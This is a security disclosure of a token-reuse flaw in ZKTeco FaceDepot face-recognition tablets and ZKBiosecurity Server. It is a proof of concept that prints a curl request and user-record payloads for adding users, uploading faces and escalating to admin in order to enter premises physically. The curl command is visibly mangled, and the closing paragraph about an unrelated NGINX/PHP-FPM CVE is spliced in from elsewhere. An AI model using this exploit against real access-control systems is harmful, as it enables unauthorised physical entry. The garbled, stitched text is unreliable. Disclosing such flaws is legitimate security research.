A token-reuse vulnerability in ZKTeco FaceDepot 7B 1.0.213 and ZKBiosecurity Server 1.0.0_20190723 allows an attacker to create arbitrary new users, elevate users to administrators, delete users, and download user faces from the database.
The vulnerability has been submitted to ZDI on Dec 3, 2019.
ZDI got one response from the vendor which acknowledged but not confirmed the vulnerability. The responsible disclosure was expired on April 30, 2020.
ZKBiosecurity Server does not do client authentication except the long-lasting token (cf. CVE-2020-17473). One has to identify which FaceDepot tablet is allowed to register a new user by sniffing the network for a period of time. After obtaining the token of the tablet, one is able to
Add a new arbitrary user (who may enter the office),
Upload a new picture (allow an adversary to physically infiltrate),
Delete an account (after a mission),
Escalate the privilege of the new use user admin (able to operate / configure the tablet in front of it.)
Add a new user
curl -v -L -X POST -A 'iClock Proxy/1.09' 'http://192.168.0.1:8088/iclock/cdata?SN=LSR1915060003&table=tabledata&tablename=user&count=1' \
-b 'token=a72182ceb8e4695ea84300155953566d' -H 'Accept: application/push' -H 'Accept-Charset: UTF-8' -H 'Accept-Language: zh-CN' \
-H 'Content-Type: application/push;charset=UTF-8' -H 'Content-Language: zh-CN' -email@example.com
Where the content of bugoy.user.post is (tab separated):
user uuid= cardno= pin=11111 password= group=1 starttime=0 endtime=0 name=Bugoy privilege=0 disable=0 verify=0
The content of totoro.post is a bit tricky, because the picture is in base64:
biophoto pin= filename=.jpg type= size= content=
After a new picture is uploaded, wait until a scheduled time where all FaceDepot tablets are synchronized or when the admin clicks "Update" on the screen.
Escalate the privilege to admin
Users with "privilege=14" have the admin access to FaceDepot tablet. With the privilege, one can configure the tablet in front of it, to add users, set user privilege, delete users, browse user database, install APK via USB (exposed at the bottom of FaceDepot 7B), and switch to apps other than ZKTeco launcher.
Administrators of NGINX web servers running PHP-FPM are advised to patch a vulnerability (CVE-2019-11043) that can let threat actors execute remote code on vulnerable, NGINX-enabled web servers. Here’s what you need to know.